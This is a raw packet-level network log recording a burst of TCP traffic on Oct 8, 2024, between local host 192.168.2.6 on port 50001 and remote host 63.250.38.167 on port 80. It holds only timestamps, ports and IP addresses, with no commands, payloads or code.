Oct 8, 2024 11:31:51.708389044 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.708390951 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.708405972 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.708420992 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.708421946 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.708431959 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.708444118 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.708494902 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.708507061 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.708518028 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.708518982 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.708518028 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.708534002 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.708544970 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.708558083 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.708570004 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.708578110 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.708578110 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.708580971 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.708594084 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.708606958 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.708617926 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.708667994 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.708679914 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.708689928 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.708690882 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.708692074 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.708704948 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.708717108 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.708728075 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.708739042 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.708750963 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.708764076 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.708775043 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.708781958 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.708781958 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.708781958 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.708787918 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.708806992 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.708808899 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.708820105 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.708830118 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.708837032 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.708853960 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.708863974 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.708867073 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.708880901 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.708898067 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.708908081 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.708908081 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.708915949 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.708946943 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.708957911 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.709012032 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.709012032 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.709012032 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.709023952 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.709155083 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.709647894 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.709777117 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.713668108 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.713680029 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.713690996 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.713705063 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.713721991 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.713732004 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.713753939 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.713778019 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.713789940 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.713824987 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.713824987 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.713871002 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.714030981 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.714129925 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.714139938 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.714145899 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.714155912 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.714168072 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.714178085 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.714200020 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.714226007 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.714227915 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.714237928 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.714251041 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.714262009 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.714276075 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.714329958 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.715074062 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.715116024 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.715219975 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.715231895 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.715245008 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.715256929 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.715267897 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.715277910 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.715289116 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.715298891 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.715302944 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.715302944 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.715312004 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.715325117 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.715336084 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.715364933 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.715364933 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.716190100 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.716201067 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.716212034 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.716223001 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.716234922 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.716245890 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.716263056 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.716284037 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.716284037 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.716321945 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.716326952 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.716342926 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.716353893 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.716365099 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.716397047 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.716397047 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.717046022 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.717056990 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.717076063 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.717086077 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.717092037 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.717099905 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.717111111 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.717122078 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.717152119 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.717153072 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.717153072 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.717163086 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.717176914 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.717190981 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.717226028 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.717226028 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.717259884 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.718005896 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.718108892 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.718121052 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.718131065 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.718142033 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.718153000 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.718163967 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.718193054 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.718204975 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.718204975 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.718205929 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.718247890 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.718676090 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.718688011 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.718702078 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.718794107 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.718803883 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.718815088 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.718826056 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.718833923 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.718833923 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.718838930 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.718858004 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.718869925 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.718873024 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.718883991 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.719013929 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.719013929 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.719655991 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.719700098 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.719708920 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.719722986 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.719733953 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.719763994 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.719801903 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.719813108 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.719819069 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.719825029 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.719835043 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.719846964 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.719857931 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.719907999 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.719908953 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.719908953 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.720722914 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.720733881 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.720746040 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.720751047 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.720756054 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.720762014 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.720911026 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.720993042 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.721004009 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.721010923 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.721021891 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.721031904 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.721046925 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.721060991 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.721070051 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.721070051 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.721085072 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.721098900 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.721108913 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.721120119 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.721131086 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.721131086 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.721137047 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.721148968 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.721149921 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.721160889 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.721174955 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.721187115 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.721210957 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.721210957 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.721227884 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.721600056 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.721661091 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.721671104 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.721682072 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.721693039 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.721704006 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.721726894 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.721726894 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.721786022 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.721867085 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.721937895 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.722037077 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.722132921 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.722143888 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.722156048 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.722165108 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.722176075 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.722188950 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.722209930 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.722228050 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.722232103 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.722232103 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.722232103 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.722244978 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.722255945 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.722266912 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.722276926 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.722286940 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.722299099 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.722310066 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.722315073 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.722323895 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.722323895 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.722323895 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.722331047 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.722343922 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.722354889 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.722361088 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.722366095 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.722378016 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.722398043 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.722398043 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.722919941 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.722959042 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.722973108 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.722981930 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.722995996 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.723007917 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.723018885 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.723035097 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.723051071 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.723062992 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.723073959 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.723083973 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.723095894 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.723105907 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.723123074 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.723129034 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.723129034 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.723140001 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.723150015 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.723153114 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.723164082 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.723220110 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.723220110 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.723710060 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.723721981 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.723732948 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.723742962 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.723753929 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.723764896 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.723774910 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.723794937 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.723794937 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.723833084 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.723844051 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.723855019 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.723865032 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.723875999 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.723886967 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.723891020 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.723891020 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.723891020 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.723897934 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.723911047 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.723913908 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.723923922 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.723974943 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.723974943 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.724426985 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.724438906 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.724450111 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.724464893 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.724476099 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.724486113 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.724497080 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.724507093 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.724513054 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.724513054 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.724513054 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.724594116 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.724813938 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.724823952 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.724944115 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.724946976 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.724955082 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.724967003 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.724977016 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.724988937 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.724997997 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.725004911 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.725018024 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.725018024 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.725020885 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.725034952 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.725047112 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.725055933 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.725097895 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.725097895 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.725097895 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.727086067 CEST	80	50001	63.250.38.167	192.168.2.6
